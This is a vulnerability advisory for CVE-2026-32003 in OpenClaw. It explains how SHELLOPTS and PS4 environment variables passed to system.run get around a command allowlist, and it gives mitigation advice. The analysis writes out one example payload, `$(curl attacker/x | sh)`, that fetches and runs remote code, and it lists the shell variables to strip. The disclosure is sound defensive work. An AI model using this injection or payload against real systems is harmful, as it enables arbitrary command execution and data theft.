CVE-2026-32003 in OpenClaw

Summary

by MITRE • 03/20/2026

OpenClaw versions prior to 2026.2.22 contain an environment variable injection vulnerability in the system.run function that allows attackers to bypass command allowlist restrictions via SHELLOPTS and PS4 environment variables. An attacker who can invoke system.run with request-scoped environment variables can execute arbitrary shell commands outside the intended allowlisted command body through bash xtrace expansion.


Analysis

by VulDB Data Team • 03/24/2026

CVE-2026-32003 affects OpenClaw versions prior to 2026.2.22. It is an environment variable injection flaw in the system.run function: the function checks the command body against an allowlist, but it does not filter the request-scoped environment variables that are passed along with the command to the shell. Two of those variables, SHELLOPTS and PS4, change how bash itself behaves, so an attacker who controls them can run commands that never appear in the allowlisted body.

The mechanism is a documented bash feature, not a bug in bash. When SHELLOPTS is present in the environment at startup, bash enables every option listed in it before running anything, so SHELLOPTS=xtrace turns on `set -x` for the child shell. With xtrace on, bash expands PS4 and prints it before each traced command, and that expansion performs parameter expansion, command substitution and arithmetic expansion. A PS4 such as `$(curl attacker/x | sh)` therefore executes its command substitution the moment the first allowlisted command is traced. The allowlist check passes, because the command body really is allowlisted; the payload lives entirely in the environment. Two caveats narrow the exposure: the body must actually be run through bash (a command executed directly from an argv array, or by a shell such as dash that does not import SHELLOPTS, is not affected by this particular trick), and bash started in privileged mode (`-p`, or setuid) ignores SHELLOPTS from the environment. The underlying weakness is a mix of incomplete input validation and missing environment sanitization at the boundary between the application and the shell.

The impact is arbitrary command execution with the privileges of the OpenClaw process: code execution, data exfiltration, or lateral movement from the host, depending on what that process can reach. Deployments that use OpenClaw for automation or system management are the most exposed, since the allowlist is the control meant to bound what an agent or caller can do. Note that the attack is not silent at the shell level: xtrace writes the expanded PS4 and each traced command to the child's stderr, so capturing and logging that stream gives a detection opportunity. The flaw maps to CWE-78 (OS command injection) and its parent class CWE-74 (injection), and to the MITRE ATT&CK tactic TA0002 (Execution). It does not by itself escalate privileges; injected commands run as the application process.

Mitigation starts with upgrading to OpenClaw 2026.2.22 or later, which changes how system.run handles environment variables. Independently of the patch, any component that forwards caller-supplied environment to a shell should either pass an explicit allowlist of variable names or, at minimum, drop the variables that alter shell or loader behavior: SHELLOPTS, BASHOPTS, PS4, BASH_ENV, ENV, PROMPT_COMMAND, IFS, and the LD_*/DYLD_* and BASH_FUNC_* families, with PATH pinned to a fixed value rather than inherited. Where possible, execute the allowlisted command as an argv array without a shell, which removes the expansion surface entirely. Run the executing process with least privilege, capture child stderr so xtrace output is visible, and review other code paths that spawn shells with externally influenced environments for the same pattern.

Responsible

VulnCheck

Reservation

03/10/2026

Disclosure

03/20/2026

Moderation

accepted

CPE

ready

EPSS

0.00070

KEV

no

Activities

very low
